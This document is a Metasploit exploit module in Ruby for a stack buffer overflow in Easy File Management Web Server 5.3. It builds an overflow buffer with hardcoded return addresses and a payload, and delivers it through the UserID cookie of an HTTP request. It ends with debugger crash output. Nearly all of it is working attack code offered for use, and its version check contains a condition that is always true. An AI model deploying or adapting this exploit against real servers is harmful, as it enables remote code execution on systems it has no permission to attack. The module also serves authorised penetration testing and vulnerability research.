##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking # Reliable memory corruption

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Easy File Management Web Server v5.3 Stack Buffer Overflow',
      'Description'    => %q{
          Easy File Management Web Server contains a stack buffer overflow
        condition that is triggered as user-supplied input is not properly
        validated when handling the User ID cookie. This may allow a remote
        attacker to execute arbitrary code.
      },
      'Author'         =>
        [
          'superkojiman',  # Vulnerability discovery
          'Julien Ahrens', # Exploit
          'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['OSVDB', '107241'],
          ['EDB',   '33610'],
          ['BID',   '67542'],
          ['URL',   'http://www.cnnvd.org.cn/vulnerability/show/cv_id/2014050536'],
          ['URL',   'http://www.web-file-management.com/']
        ],
      'Platform'       => 'win',
      'Arch'           => ARCH_X86,
      'DefaultOptions' =>
        {
          'ExitFunction'   => 'process'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars'   => "\x00\x0a\x0d;",
          'Space'      => 3420 # Lets play it safe
        },
      'Targets'        =>
        [
          # Successfully tested efmws.exe (5.3.0.0) on:
          # -- Microsoft Windows XP [Version 5.1.2600]
          # -- Microsoft Windows    [Version 6.1.7600]
          # -- Microsoft Windows    [Version 6.3.9600]
          [ 'efmws 5.3 Windows Universal', { 'Ret' => 0x10010101 } ]
          # PPR from ImageLoad.dll
        ],
      'DisclosureDate' => 'May 20 2014',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('TARGETURI', [true, 'The URI path of an existing resource', '/vfolder.ghp'])
        ], self.class)
  end

  def check

    #
    # NOTE: Version 5.3 still reports "4.0" in the "Server" header
    #

    res = send_request_raw 'uri' => '/whatsnew.txt'
    #if not res
    unless res?
      vprint_status "#{peer} - No response to request"
      return Exploit::CheckCode::Unknown
    end
    if res.body =~ /What's new in Easy File Management Web Server V(\d\.\d)/
      version = "#{$1}"
      vprint_status "#{peer} - Found version: #{version}"
      if version == "5.3"
        return Exploit::CheckCode::Appears
      end
    end
    if res.headers['server'] =~ /Easy File Management Web Server v(4\.0)/
      return Exploit::CheckCode::Detected
    end
    Exploit::CheckCode::Safe
  end

  def exploit

    #
    # Check if target doesn't appear to be vulnerable, if so exit
    # NOTE: if reported as detected continue incase whatsnew.txt is not reachable
    #

    unless check == Exploit::CheckCode::Appears || Exploit::CheckCode::Detected
      fail_with(Failure::NoTarget, "#{peer} - Target does not appear to be running fmws 5.3")
    end

    #
    # Fu to JMP ESP where payload lives
    # NOTE: Opcode 'JMP ESP' only existed in V5.3
    #

    sploit =  rand_text(80)
    sploit << [0x1001D8C8].pack("V")
    sploit << rand_text(280)
    sploit << [target.ret].pack("V")
    sploit << [0xA445ABCF].pack("V")
    sploit << [0x10010125].pack("V")
    sploit << [0x10022AAC].pack("V")
    sploit << rand_text(8)
    sploit << [0x1001A187].pack("V")
    sploit << [0x1002466D].pack("V")
    sploit << payload.encoded

    print_status "#{peer} - Trying target #{target.name}..."

    #
    # NOTE: Successful HTTP request is required to trigger
    #

    send_request_cgi({
      'uri'    => normalize_uri(target_uri.path),
      'cookie' => "SESSIONID=; UserID=#{sploit}; PassWD=;",
    }, 5)

  end
end

=begin

#
# 0x44f57d This will write UserID up the stack. If the UserID is to large it
# will overwrite a pointer which is used later on at 0x468702
#

eax=000007d1 ebx=00000000 ecx=000001f4 edx=016198ac esi=01668084 edi=016198ac
eip=0044f57d esp=016197e8 ebp=ffffffff iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
fmws+0x4f57d:
0044f57d f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:004> dd @esi
01668084  41414141 41414141 41414141 41414141
01668094  41414141 41414141 41414141 41414141
016680a4  41414141 41414141 41414141 41414141
016680b4  41414141 41414141 41414141 41414141
016680c4  41414141 41414141 41414141 41414141
016680d4  41414141 41414141 41414141 41414141
016680e4  41414141 41414141 41414141 41414141
016680f4  41414141 41414141 41414141 41414141

(c38.8cc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=015198fc edx=41414141 esi=015198ec edi=015198fc
eip=00468702 esp=015197c0 ebp=ffffffff iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
fmws+0x68702:
00468702 ff5228          call    dword ptr [edx+28h]  ds:0023:41414169=????????

=end